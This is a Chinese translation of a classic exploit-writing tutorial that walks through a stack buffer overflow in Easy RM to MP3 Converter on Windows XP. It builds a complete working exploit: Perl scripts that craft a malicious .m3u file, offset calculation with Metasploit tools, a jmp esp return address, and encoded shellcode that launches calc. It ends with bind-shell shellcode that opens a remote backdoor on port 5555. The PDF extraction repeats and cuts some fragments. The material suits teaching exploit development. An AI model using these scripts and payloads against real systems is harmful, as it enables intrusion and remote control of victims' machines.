Exploit 编写教程第一篇 : 基于栈的溢出译 : 看雪论坛 -moonife 上个星期五 ( ), 一个叫 Crazy_Hacker 的人 (nick) 在 packetstormsecurity.org. 网站报告了一个存在于 Easy RM to M

Size: px

Start display at page:

Download "Exploit 编写教程第一篇 : 基于栈的溢出译 : 看雪论坛 -moonife 上个星期五 ( ), 一个叫 Crazy_Hacker 的人 (nick) 在 packetstormsecurity.org. 网站报告了一个存在于 Easy RM to M"

逻自何
5 years ago
Views:

1 Exploit 编写教程第一篇 : 基于栈的溢出译 : 看雪论坛 -moonife 上个星期五 ( ), 一个叫 Crazy_Hacker 的人 (nick) 在 packetstormsecurity.org. 网站报告了一个存在于 Easy RM to MP3 Conversion Utility (on XP SP2 En) 软件中的漏洞 ( 同时还发布了漏洞利用的 POC 代码 ( 顺便说下, 在我的虚拟机 xp sp3 英文版中利用不成功 ) 没多久另一个 Exploit 也放了出来漂亮你可以复制这个 POC 代码, 运行它, 也许看到它没利用成功 ( 或者你真的幸运的话, 会成功的 ) 又或者你试着理解它并编译自己的可以成功利用的 Exploit; 在者你就从头开始编写自己的 Exploit 在啰嗦下 : 除非你真能够快速的反汇编和读懂 shellcode, 否则我建议你不要拿到一个 Exploit ( 特别是已经编译了的可执行文件 ) 就运行它, 假如它仅仅是为了在你电脑上开一个后门呢? 问题是 :Exploit 作者是怎样开发他们的利用程序的呢? 从检测可能存在的问题到编写可以利用成功的 Exploit 这个过程是怎么样的呢? 您如何使用漏洞信息, 编写自己的 Exploit 呢? 自从我这个 Blog 的建立, 写缓冲区溢出利用的基础教程就摆到了我 To Do 列表上了, 但是我真的没时间去写 ( 要不就是忘了 ) 今天当我看到这个漏洞报告的时候, 大致看来一下它的利用, 我意识到这个漏洞报告可以用来做为展示如何编写基本的 Exlpoit 的完美案例它的简洁可以让我用来展示编写有效和稳定的基于缓冲区溢出的 Exlpoit 的一些技术所以现在也许是个好时机... 尽管这个漏洞已经有了一个 Exploit( 无论它是否真的有效 ), 我依然用这个存在于 Easy RM to MP3 Conversion Utility 上漏洞作为一个案例来迈出我们编写有效的 Exploit 的第一步, 当然是在手上没有其他人给出 Exploit 的情形下我们将从头开始开发 ( 环境是在 XP sp3 下 ) 在我们开始之前, 我先做如下声明 : 这个文档只作为纯粹的教育目的, 我不想任何人用这个文档上或我博客上的任何信息真的去攻击电脑或破坏行为因此我对使用这些信息而做出的破坏行为不负任何的责任到时如果我不允许, 你将不能继续访问我的网站, 所以如果你怀着龌龊的目的, 请你马上离开! 不管怎么样, 开始吧! 通常你可以在漏洞报告中得到基本的信息在本例中, 基本信息有 : 通过创建一个恶意的.m3u 文件将触发 Easy RM to MP3 Converter version 缓冲区溢出利用这些报告往往没什么特别之处, 但在多数情况下, 你会从中得到一些灵感来模拟一次崩溃或让程序行为异常如果没有, 那么第一个发现的安全研究人员可能会透露给供应商, 给他们机会修补... 或者只是想保密为他 / 她所用...

开始 Exploit 编写系列 ( 希望 ) 教程第一部分之前, 请允许我介绍下我发起的讨论组 ( 需要注册 ), 在那里你可以讨论 Exploit 的编写相关问题可通过这个网址访问 : http://www.corelan.be:8800/index.

2 开始 Exploit 编写系列 ( 希望 ) 教程第一部分之前, 请允许我介绍下我发起的讨论组 ( 需要注册 ), 在那里你可以讨论 Exploit 的编写相关问题可通过这个网址访问 : 验证 Bug 首先, 让我们验证当这个程序打开恶意构造的 m3u 文件的时候确实崩了 ( 或者找一个类似的当打开特别构造数据文件的时候崩溃的程序 ) 在 XP 上安装带有漏洞的 Easy RM to MP3 程序版本漏洞报告指出这个 Exploit 工作在 xp sp2 下, 但是我用 sp3( 英文版 ) 程序在这里下载 (moonife: 没下载地址, 自己找 ): 提示 : 你可以到 oldapps.com 和 oldversion.com 找到旧的版本我们将用下面简单的 perl 脚本来创建一个 m3u 文件, 或许它或帮我们找到关于这个漏洞的更多有用信息 my $file= "crash.m3u"; my $junk= "\x41" x 10000; open($file,">$file"); print $FILE "$junk"; close($file); print "m3u File Created successfully\n"; 运行这个 perl 脚本创建 m3u 文件, 文件将被个 A(0x41) 字母来填充, 然后用 Easy RM to MP3 打开... 程序抛出一个错误, 但是看起来这个错误被程序异常处理例程捕捉到了, 程序并没崩掉试下个 A, 一样的结果 ( 看来还没冲掉有用的信息啊 ) 很好, 换个... Boom- 程序崩掉了好, 这样看了程序在到个之间可以崩掉, 那么我们用这个可以做什么呢? 验证 Bug 是否可以勾起我们的兴趣

3 很明显, 一个程序的崩溃并不都意味着存在可利用的漏洞, 在多数情况下, 程序崩溃并不能利用, 但是有时候是可以利用的可利用, 我是指你可以让程序做出越轨的事... 比如执行你自己的代码, 让一个做越轨的事最简单的方法是控制它的执行流程 ( 让它指向别是什么地方 ) 可通过控制指令指针(EIP), 这个 CPU 寄存器永远指向下一条要执行的指令地址假定程序调用只有一个参数的函数, 在进入函数前, 它要先保存当前指令的地址 (moonife: 返回地址压栈, 这个地址具体是 call XXXX 指令的下一条指令起始地址 ), 如果你改变这个指针 (EIP) 的值, 让它指向你的代码片段, 这样你就获得了程序流程的控制权和让它干越轨的事了一般的在控制流程后让程序执行你希望执行的那些代码叫做 shellcode 如果我们可以让程序执行我们的 shellcode, 我们可以叫它 Working Exploit 多数情况下这个指针叫它 EIP 这个寄存器大小为 4 Byte 所以你可以修改这四个字节, 在你的程序 ( 或电脑上正在运行的程序 ) 继续前需要的一些理论知识我们只需要很少的几个术语用户进程空间中关键的 3 个组成部分 : 代码段 :( 包含可执行程序中的指令 EIP 始终指向下一条指令 ) 数据段 :( 变量, 动态的缓冲区 ) 栈段 :( 用了传数据 / 参数给函数, 还用作局部变量的的空间栈段从 (= 栈的底部 )) 整个虚拟内存页 (4KB) 低部开始向低地址方向增长 Push 指令将把一个 4byte 大小的值压入栈, pop 则将一个 4byte 大小的值入栈如果你要直接访问栈中数据, 可以通过 ESP, 它永远指向栈顶当执行 push 指令后,ESP 将指向低地址 (ESP-4), 高地址 (ESP+4) 而执行 pop 指令的时候,ESP 将指向当进入一个函数 / 例程中的时候, 将创建一个函数帧这个帧和调用者传进来的参数连在一起和被用来给子例程传参数可通过 ESP 获得当前栈顶, 通过 EBP 获得函数帧的底部 CPU(Intel,x86) 各主要寄存器的一般用途 : EAX: 存储器 : 用于执行计算, 并用于存储函数的返回值基本操作, 如加, 减, 比较使用这个通用寄存器 EBX: 存储数据 ECX: 计数器 : 常用于计数循环的次数 EDX: 数据 ESP: 栈顶指针 EBP: 基指针 ( 常用来表示一个函数帧的底部 ) ESI: 源操作数指针 EDI: 目的地址指针 EIP: 指令指针

4 用户进程空间映像如下图所示 :.text 区块是只读的, 包含了程序的执行代码, 防止被修改这些虚拟内存区块有着固定的大小.data 和.bss 区块被用来保存全局和静态的变量.data 区块用于已经初始化的全局变量, 字符串, 和其他的内容.bss 区块用于未初始化的变量... 这两个区块都是可写的和有固定的大小堆区块被用于其他的变量 (moonife: 动态申请的 ) 它可以根据需要来改变大小堆内存的分配工作由系统来管理栈的数据结构特点是 LIFO( 后进先出 ) 最后通过 push 压入的将最先被 pop 弹出栈包括

5 局部变量, 函数调用和不需要长期保存的其他信息每一个数据被压入, 往低地址方向生长每调用一个函数, 参数都将会并诶调用者压入栈中, 同时保存 EBP 和 EIP 的值当函数返回时, 保存的栈中原 EIP 值将弹出到 EIP 中, 所以正常的执行流程被恢复这样 : 当函数 Do_Something(param 1) 被调用, 有以下步骤 : Push param 1 Call Do_Something 的同时 push EIP( 返回地址 ) Push EBP, 这是必须的, 因为我们需要改变 EBP 的值来引用栈中的值, 这是通过 mov ebp,esp 来实现的, 所以栈中的数据, 很容易被引用最后, 局部变量被压入栈, 在我们这个例子是 :do_something::buffer[128] 因此, 当函数结束的时候, 将返回 main 函数 Memory map : Top of stack. ESP points to begin of do_something::buffer[128] Bottom of stack.text.data.bss do_something::buffer[128] saved EBP saved EIP ptr to param1 main() local vars envp, argv, etc 如果想要引发缓冲区溢出, 你需要重写 do_something::buffer 空间以及被保存的 EBP 和最终 EIP 的值当我们的 do_something 函数返回的时候, 从栈中弹出已被重写的 EIP 的和 EBP 长话短说, 通过控制 EIP, 函数将使用被改变的返回地址来恢复正常流程如果你可以重写缓冲区,EBP,EIP 和把你自己的代码放到 prt to param1 在 (moonife: 进入函数前压入的参数所在的栈位置 ) 的地方... 思考下在缓冲区被填充为 [buffer][ebp][eip][your code] 后,ESP 应该就指向你代码开始的地方了所以只要你让 EIP 指向你的代码, 控制权在你手中了! 为了观察栈中数据和各寄存器的值, 我们需要把一个调试器附加到程序上, 如此我们就可以观察程序的运行情况 ( 特别的崩溃现场 ) 这里有很多调试器可以到达这个目的, 为经常使用的是 :Windbg, OllyDbg, Immunity s Debugger 和 PyDBG 这里我们用 WinDbg, 按照 WinDbg( 完全安装 ) 和用 windbg -I 注册它为一个 post-mortem 调试器

$你可以禁止 xxxx has encountered a problem and needs to close 的弹窗通过设置下面的键值 : HKLM\Software\Microsoft\Windows$ $然后 File -> Symbol File Path, 输入以下字符串 : SRV*C:\windbgsymbols*http://msdl.microsoft.$

6 你可以禁止 xxxx has encountered a problem and needs to close 的弹窗通过设置下面的键值 : HKLM\Software\Microsoft\Windows NT\CurrentVersion\AeDebug\Auto : 设为 0 为了避免 WinDbg 找不到符号文件, 在硬盘上创建一个文件夹 ( 如 :c:\windbgsymbols) 打开 WinDbg, 然后 File -> Symbol File Path, 输入以下字符串 : SRV*C:\windbgsymbols* 好了, 让我们开始吧! 运行 Easy RM to MP3, 并打开恶意构造的 m3u 文件程序再次崩溃, 如果你已经禁止了弹窗, WinDbg 会自动捕获异常, 如果没有禁止, 点击 debug 按钮开始用 WinDbg 调试

我们可以看到此时 EIP 的值被覆盖为 41414141, 是 AAAA 的 16 进制形式小知识补充 : 在 Intel X86 上, 采用小端字节序 (moonife: 地址低位存储值的低位, 地址高位存储值的高位 ) 所以你看到的 AAAA 其实是反序的 AAAA( 就是如果你传进缓冲区的是 ABCD,EIP 的值将是 44434241:DCBA) 如此看来我们的 m3u

7 我们可以看到此时 EIP 的值被覆盖为 , 是 AAAA 的 16 进制形式小知识补充 : 在 Intel X86 上, 采用小端字节序 (moonife: 地址低位存储值的低位, 地址高位存储值的高位 ) 所以你看到的 AAAA 其实是反序的 AAAA( 就是如果你传进缓冲区的是 ABCD,EIP 的值将是 :DCBA) 如此看来我们的 m3u 文件的部分数据被读进了缓冲区导致了溢出这样我们已经可以触发缓冲区溢出和写值到 EIP 中了这样的漏洞我们就叫做栈溢出 ( 或缓冲区溢出 :BOF) 前面我们的 m3u 文件里面都是 A, 我们无法确切的知道缓冲区的大小已至于我们无法把 shellcode 的起始地址写到 EIP, 所以我们要定位保存的返回地址在缓冲区的偏移确定缓冲区的大小和准确的重写 EIP 我们从前面可以得知返回地址在缓冲区开始位置的到字节之间现在, 你可以尝试先把到字节之间的空间都重写成你 shellcode 的起始地址但是如果可以精确的定位返回地址的偏移要比这个漫天散花要好很多, 所以为了精确定位, 还有些工作做首先, 让我们通过改变我们的 Perl 脚本尝试缩小一点散花范围 : 我们使用二分法用个 A 和 5000 个 B 填充 m3u 文件, 如果 EIP 被冲刷成 (AAAA) 那么 E 返回地址就位于到之间, 被冲刷成 (BBBB) 那么就位于到

$30000 之间 my $file= "crash25000.m3u"; my $junk = "\x41" x 25000; my $junk2 = "\x42" x 5000; open($file,">$file"); print $FILE $junk.$

8 30000 之间 my $file= "crash25000.m3u"; my $junk = "\x41" x 25000; my $junk2 = "\x42" x 5000; open($file,">$file"); print $FILE $junk.$junk2; close($file); print "m3u File Created successfully\n"; Easy RM to MP3 打开我们创建的 crash25000.m3u 文件可以看到 EIP 为 (BBBB), 所以返回地址位于到之间了 [5000 B's ] [AAAAAAAAAAAAAAAAAAAAAABBBBBBBBBBBB][BBBB][BBBBBBBBB...] A's EIP ESP points here 查看 ESP 所值的内存数据 : 是个好消息, 我们用 BBBB 重写了 EIP 和可以看到 ESP 所指的缓冲区在我们调整脚本之前, 需要精确的定位出来返回地址在缓冲区的位置为了精确定位, 我们使用 Metasploit Metasploit 是一个漂亮的工具可以助我们计算偏移, 它指定包含唯一模型 ( 特殊构造的 ) 的字符串, 用这个模型 ( 通过在我们恶意构造的 m3u 文件中使用这个模型和 EIP 的值 ), 我们可以定位到返回地址在缓冲区中的偏移

打开 metasploit framework3 文件夹下的工具文件夹 ( 我用的 linux 版本 ), 你可以找个一个 pattern_create.rb 的工具创建一个包含 5000 个字符的模型并写到文件 root@bt:/pentest/exploits/framework3/tools#./pattern_create.rb Usage: pattern_create.

9 打开 metasploit framework3 文件夹下的工具文件夹 ( 我用的 linux 版本 ), 你可以找个一个 pattern_create.rb 的工具创建一个包含 5000 个字符的模型并写到文件 root@bt:/pentest/exploits/framework3/tools#./pattern_create.rb Usage: pattern_create.rb length [set a] [set b] [set c] root@bt:/pentest/exploits/framework3/tools#./pattern_create.rb 5000 编辑我们的 perl 脚本使用 $junk2 的内容代替我们的 5000 个字符 my $file= "crash25000.m3u"; my $junk = "\x41" x 25000; my $junk2 = put the 5000 characters here open($file,">$file"); print $FILE $junk.$junk2; close($file); print "m3u File Created successfully\n"; 再次用 Easy RM to MP3 打开这个 m3u 文件, 程序崩溃和记录下 EIP 的值 At this time, eip contains 0x356b4234 (note : little endian : we have overwritten EIP with b 35 = 4Bk5 这个时候,EIP=0x356b4234( 小端字节序 : b 35=4BK5) 再又 metasploit 工具计算在返回地址前面缓冲区的真正长度填写 EIP 的值 ( 基于模型文件 ) 和缓冲区的长度 root@bt:/pentest/exploits/framework3/tools#./pattern_offset.rb 0x356b root@bt:/pentest/exploits/framework3/tools# 重写 EIP 前面需要冲刷的缓冲区长度所以你可以创建一个文件, 填充个 A, 在加 4 个 B,EIP 应该就会被重写成为现在我们已经知道了返回地址在缓冲区中的偏移了, 我们在 4 个 B 后在填充一些 C 修改创建 m3u 文件的 perl 脚本 : my $file= "eipcrash.m3u"; my $junk= "A" x 26094; my $eip = "BBBB"; my $espdata = "C" x 1000; open($file,">$file"); print $FILE $junk.$eip.$espdata; close($file); print "m3u File Created successfully\n"; Easy RM to MP3 打开, 崩溃,WinDbg 附加调试 :

10 EIP= (BBBB), 这就是我们想要的, 现在可以控制 EIP 了,ESP 所指向的缓冲区都重写为 C 了注意 : 这个偏移值是在我系统的分析结果如果你要在你的系统上进行本教程练习, 可能得到的不一样的偏移 ( 依赖 SP 等级, 语言等 ), 所以不要照搬我得到的偏移到你的代码中我们的 Exploit 缓冲区视图参考如下 : 栈视图参考如下 :

11 当函数返回,BBBB 被置入 EIP 中 (pop), 所以流程尝试到地址 0x (BBBB) 执行找内存空间存放我们的 shellcode 我们可以控制 EIP 让他指向我们的 shellcode, 我们如何把 shellcode 放到被攻击进程的虚拟内存空间和让 EIP 指向它并被执行呢? 为了让程序崩溃, 我们把个 A 写入内存, 和一个新的值覆盖返回地址, 还有一部分的 C 当程序崩溃时, 查看崩溃现场的各寄存器的值和 dump 它们所指的内存映像 (d esp,d eax,d ebx...) 如果你可以看到某个寄存器所值的内存 dump 包含有 A 或 C, 你就可以把它填充成 shellcode, 在本例中, 我们看到 ESP 指向我们填充的 C( 记着输出的 ESP 的上限 ), 所以我们用 shellcode 替换我们的 C 和告诉 EIP 跳到 ESP 去执行尽管我们看到了 C 了, 但我们不能确定这第一个 ( 在地址 0x000ff730 处 ) 是不是我们填充在 m3u 文件中的第一个字母 C 我们修改 perl 脚本, 用一个包含 144 个字符 ( 你可以更多或更少 ) 的模型替代字母 C my $file= "test1.m3u"; my $junk= "A" x 26094;

my $eip = "BBBB"; my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK". "5ABCDEFGHIJK6ABCDEFGHIJK". "7ABCDEFGHIJK8ABCDEFGHIJK". "9ABCDEFGHIJKAABCDEFGHIJK".

12 my $eip = "BBBB"; my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK". "5ABCDEFGHIJK6ABCDEFGHIJK". "7ABCDEFGHIJK8ABCDEFGHIJK". "9ABCDEFGHIJKAABCDEFGHIJK". "BABCDEFGHIJKCABCDEFGHIJK"; open($file,">$file"); print $FILE $junk.$eip.$shellcode; close($file); print "m3u File Created successfully\n"; 创建这个文件让程序崩溃, 查看 ESP 所指的内存 dump: 我们看到两个有意思的事 : ESP 所指从我们模型中的第五个字符开始, 不是第一个, 你想知道为什么 (moonife: 我跟了下, 导致溢出的函数有一个参数, 所以返回时还需要把这个参数弹出 :return 4, 所以指向了第五个 ), 请看下面的文章 : 在模型字符串后面, 我们看到字母 A, 这些 A 很可能是我们我们填充个 A 在缓冲区的第一部分, 所以我们可以把 shellcode 放到这里 ( 在重写返回之前 )... 但是我们还是不要这样做, 我们在模型字符串前面加 4 个字符做为测试, 看是否 esp 指向我们模型字符串的开始 : my $file= "test1.m3u"; my $junk= "A" x 26094; my $eip = "BBBB"; my $preshellcode = "XXXX"; my $shellcode = "1ABCDEFGHIJK2ABCDEFGHIJK3ABCDEFGHIJK4ABCDEFGHIJK". "5ABCDEFGHIJK6ABCDEFGHIJK". "7ABCDEFGHIJK8ABCDEFGHIJK". "9ABCDEFGHIJKAABCDEFGHIJK". "BABCDEFGHIJKCABCDEFGHIJK"; open($file,">$file"); print $FILE $junk.$eip.$preshellcode.$shellcode; close($file); print "m3u File Created successfully\n"; 在崩溃在查看 ESP 指向的内存 dump:

很好! 现在我们可以 : 控制 EIP 有了放 shellcode 的空间 ( 至少 144 字节大小 ) 一个寄存器直接指向我们的代码, 地址为 0x000ff730 现在我们需要 : 编写真正的 shellcode 告诉 EIP 跳到我们的 shellcode 执行, 重写 EIP 为 0x000ff730 就可以达到这个目的了这样 : 我们做一个小试验 : 把 m3u 文件填充为

13 很好! 现在我们可以 : 控制 EIP 有了放 shellcode 的空间 ( 至少 144 字节大小 ) 一个寄存器直接指向我们的代码, 地址为 0x000ff730 现在我们需要 : 编写真正的 shellcode 告诉 EIP 跳到我们的 shellcode 执行, 重写 EIP 为 0x000ff730 就可以达到这个目的了这样 : 我们做一个小试验 : 把 m3u 文件填充为个字母 A, 然后是覆盖 EIP 的 000ff730, 在 25 个 NOP 指令, 在一个 int 3 中断 (0xCC), 在一些 NOP 如果没什么意外,EIP 跳到了 000ff730 处执行, 执行 Nop, 接着一个中断 my $file= "test1.m3u"; my $junk= "A" x 26094; my $eip = pack('v',0x000ff730); my $shellcode = "\x90" x 25; $shellcode = $shellcode."\xcc"; $shellcode = $shellcode."\x90" x 25; open($file,">$file"); print $FILE $junk.$eip.$shellcode; close($file); print "m3u File Created successfully\n"; 程序崩溃了, 但我们预料中的中断变成了非法访问,EIP 的值没错是 000ff730(=ESP), 但是当我们 ESP 指向内存 dump 的时候并不是预期的那样 :

可靠的跳转到 shellcode 我们可以成功的把 shellcode 放置到 ESP 指向的空间 ( 或者另一个角度看, 就是 esp 指向我们 shellcode 的起始 ) 如果在本例中没有这个 ESP, 我们希望有其他寄存器指向我们希望的缓冲区位置不管怎么说, 在这个例子中, 我们可以使用 ESP 我们用 ESP 的地址重写我们的 EIP, 就是想让程序跳到我们的 shellcode

14 所以直接跳到一个内存地址不是一个好的方法 (000ff730 包含了字符串终止符 (NULL:00)... 所以你看到来自缓冲区第一部分的字母 A... 我们无法到达重写 EIP 后我们的数据了... 另一方面, 在 Exploit 使用内存地址直接跳转是非常不可靠的... 因为内存地址会因为系统版本, 语言等的不同而不同 ) 简单的讲 : 我们不能用 000ff730 这样的内存地址来重写 EIP 这不是好方法我们必须使用其他的技术达到同样的目的 : 为了让程序跳到我们的 shellcode, 我们需要借助一个寄存器, 在本例中是 ESP, 我们要在进程空间中找到跳转到我们寄存器 (moonife:jmp esp or call esp) 这样的指令可靠的跳转到 shellcode 我们可以成功的把 shellcode 放置到 ESP 指向的空间 ( 或者另一个角度看, 就是 esp 指向我们 shellcode 的起始 ) 如果在本例中没有这个 ESP, 我们希望有其他寄存器指向我们希望的缓冲区位置不管怎么说, 在这个例子中, 我们可以使用 ESP 我们用 ESP 的地址重写我们的 EIP, 就是想让程序跳到我们的 shellcode 代码并执行跳转到 ESP 在 windows 应用程序中是常有的事事实上, 每个程序都会加载一个或一个以上的 DLL, 这些 DLL 包含了大量的指令还有,DLL 的地址是固定的, 所以我们可以在一个 DLL 中找到 jmp ESP 这样的指令, 接着用这个指令所在地址去重写 EIP, 这下就应该行了, 不是吗? 首先, 我们要找到 jmp esp 所在位置我们可以通过运行 Easy RM to MP3, 然后打开 WinDbg 附加到 Easy RM to MP3 进程, 我们可以从 command 窗口中看到已经被程序加载了的所有 DLL 一旦调试器附加到进程, 程序就会被中断在 Windbg 的 command 窗口中, 屏幕的底部, 输入 a (assemble) 然后回车键, 现在输入 jmp esp 然后回车

在回车现在输入 u (unassemble) 跟上 jmp esp 前面出来的地址在 7c90120e, 后面, 你可以看到

RM to MP3 程序加载了的 DLL 条目 : 如果我们可以在 DLL 中找的 ffe4 这个机器码, 我们就有一个好的机会使我们的

$所以这里我们首选用 Easy RM to MP3 自身的 DLL 我们看 C:\Program Files\Easy RM to MP3$

15 在回车现在输入 u (unassemble) 跟上 jmp esp 前面出来的地址在 7c90120e, 后面, 你可以看到 ffe4 这是 jmp esp 的机器码现在我们到加载的 dll 中搜索这个机器码看 Windbg 窗口的顶部, 会看被 Easy RM to MP3 程序加载了的 DLL 条目 : 如果我们可以在 DLL 中找的 ffe4 这个机器码, 我们就有一个好的机会使我们的 Exploit 稳定可靠的运行在 windos 平台上了但是如果我们使用系统 dll, 那么在其他版本的系统上可能不行了, 所以这里我们首选用 Easy RM to MP3 自身的 DLL 我们看 C:\Program Files\Easy RM to MP3 Converter\MSRMCcodec02.dll 这个 dll, 它被加载到 01b10000 到 01fd000 地址区间, 在这个区间找 ffe4:

16 不错 ( 没出来什么意外...jmp esp 是一个很常用的指令 ) 我们选择一个地址, 观察地址中是否含有 NULL(00) 字节是很重要的事, 因为它可能被当做字符串的结束, 而我们后面要写进去的内容被截断另一个找 opcodes 的好方法是 : s l fffffff ff e4 ( 属于系统 dll 的空间 ) 提示 : 另一个方法获得 opcode 的地址 : findjmp ( 来自 Ryan Permeh) : 编译 findjmp.c 和所有以下参数运行 : 还可以用 metasploit opcode database 详见下一教程... 从我们把 shellcode 放置到 ESP 所值内存 ( 在重写 EIP 后面跟上的字符串 ), 这个 jmp esp 不能含 NULL(00) 字节, 含 0 会被认为是字符串的结束而我们的 shellcode 被截断

17 所以我们首先选用这个地址 :0x01ccf23a 确保这个地址是包含指令 jmp esp 的 ( 所以反汇编这个地址 ): 现在我们只要重写 EIP 为 0x01ccf23a,jmp esp 就实现了 ESP 指向我们的 shellcode... 在了我们的 NOP & break shellcode: 程序预期的中断在地址 000ff745 处, 所以说明 jmp esp 有效了, 但是这个 shellcode 都是 NOP, 干不了什么, 接下来我们就开始真正的 shellcode 了.. 写 shellcode 和完成 Exploit Metasploit 有一个好好的 payload generator, 它可以帮助我们编写 shellcode Payloads 这个术语来自病毒, 取决于我们要做什么, 它可以大或小如果你的缓冲区的大小有限制, 你可能就想要一个多阶的 shellcode 或一个 mini 型的 shellcode( 比如一个在 xp sp2 平台下的 32 字节的命令行 shellcode), 你还可以把你 shellcode 分成小块, 然后用 egg-hunting 技术在执行前把它重组我们想要 Exploit 运行 calc( 计算器 ) 在我们的 Exploit payload 中, 我们应该这样写 : # windows/exec bytes # # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc my $shellcode = "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1". "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30". "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa". "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96". "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b". "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a". "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83".

$"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98". "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61". "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05".$

18 "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98". "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61". "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05". "\x7f\xe8\x7b\xca"; 完成这个 perl 脚本和测试 : # # Exploit for Easy RM to MP vulnerability, discovered by Crazy_Hacker # Written by Peter Van Eeckhoutte # # Greetings to Saumil and SK :-) # # tested on Windows XP SP3 (En) # # # my $file= "exploitrmtomp3.m3u"; my $junk= "A" x 26094; my $eip = pack('v',0x01ccf23a); #jmp esp from MSRMCcodec02.dll my $shellcode = "\x90" x 25; # windows/exec bytes # # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, CMD=calc $shellcode = $shellcode. "\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1". "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30". "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa". "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96". "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b". "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a". "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83". "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98". "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61". "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05". "\x7f\xe8\x7b\xca"; open($file,">$file"); print $FILE $junk.$eip.$shellcode; close($file); print "m3u File Created successfully\n"; 首先, 关闭 autopopup 注册表设置, 避免调试器自动附加. 创建这个 m3u 文件并打开, 不出意外的话应该就可以看到程序崩溃和计算器被打开了 Boom! 我们有第一个可以工作的 Exploit 了!

19 如果你不只是想打开计算器呢? 你可以编写其他不是运行计算器的 shellcode, 但是可能由于大而导致无法运行, 或者是内存位置的不同随着 shellcode 体积的加大会使 shellcode 中出现无效字符的风险增大, 无效字符需要过滤才行现在我们来弄一个开启一个远程后门并获得命令行的 shellcode: # windows/shell_bind_tcp bytes # # Encoder: x86/shikata_ga_nai # EXITFUNC=seh, LPORT=5555, RHOST= "\x31\xc9\xbf\xd3\xc0\x5c\x46\xdb\xc0\xd9\x74\x24\xf4\x5d" "\xb1\x50\x83\xed\xfc\x31\x7d\x0d\x03\x7d\xde\x22\xa9\xba" "\x8a\x49\x1f\xab\xb3\x71\x5f\xd4\x23\x05\xcc\x0f\x87\x92" "\x48\x6c\x4c\xd8\x57\xf4\x53\xce\xd3\x4b\x4b\x9b\xbb\x73" "\x6a\x70\x0a\xff\x58\x0d\x8c\x11\x91\xd1\x16\x41\x55\x11" "\x5c\x9d\x94\x58\x90\xa0\xd4\xb6\x5f\x99\x8c\x6c\x88\xab" "\xc9\xe6\x97\x77\x10\x12\x41\xf3\x1e\xaf\x05\x5c\x02\x2e" "\xf1\x60\x16\xbb\x8c\x0b\x42\xa7\xef\x10\xbb\x0c\x8b\x1d" "\xf8\x82\xdf\x62\xf2\x69\xaf\x7e\xa7\xe5\x10\x77\xe9\x91" "\x1e\xc9\x1b\x8e\x4f\x29\xf5\x28\x23\xb3\x91\x87\xf1\x53" "\x16\x9b\xc7\xfc\x8c\xa4\xf8\x6b\xe7\xb6\x05\x50\xa7\xb7" "\x20\xf8\xce\xad\xab\x86\x3d\x25\x36\xdc\xd7\x34\xc9\x0e" "\x4f\xe0\x3c\x5a\x22\x45\xc0\x72\x6f\x39\x6d\x28\xdc\xfe" "\xc2\x8d\xb1\xff\x35\x77\x5d\x15\x05\x1e\xce\x9c\x88\x4a" "\x98\x3a\x50\x05\x9f\x14\x9a\x33\x75\x8b\x35\xe9\x76\x7b" "\xdd\xb5\x25\x52\xf7\xe1\xca\x7d\x54\x5b\xcb\x52\x33\x86" "\x7a\xd5\x8d\x1f\x83\x0f\x5d\xf4\x2f\xe5\xa1\x24\x5c\x6d" "\xb9\xbc\xa4\x17\x12\xc0\xfe\xbd\x63\xee\x98\x57\xf8\x69" "\x0c\xcb\x6d\xff\x29\x61\x3e\xa6\x98\xba\x37\xbf\xb0\x06" "\xc1\xa2\x75\x47\x22\x88\x8b\x05\xe8\x33\x31\xa6\x61\x46" "\xcf\x8e\x2e\xf2\x84\x87\x42\xfb\x69\x41\x5c\x76\xc9\x91" "\x74\x22\x86\x3f\x28\x84\x79\xaa\xcb\x77\x28\x7f\x9d\x88" "\x1a\x17\xb0\xae\x9f\x26\x99\xaf\x49\xdc\xe1\xaf\x42\xde" "\xce\xdb\xfb\xdc\x6c\x1f\x67\xe2\xa5\xf2\x98\xcc\x22\x03" "\xec\xe9\xed\xb0\x0f\x27\xee\xe7"; 正如你看到的, 这个 shellcode 有 344 字节大小 ( 而开个计算器只需要 144 字节 ) 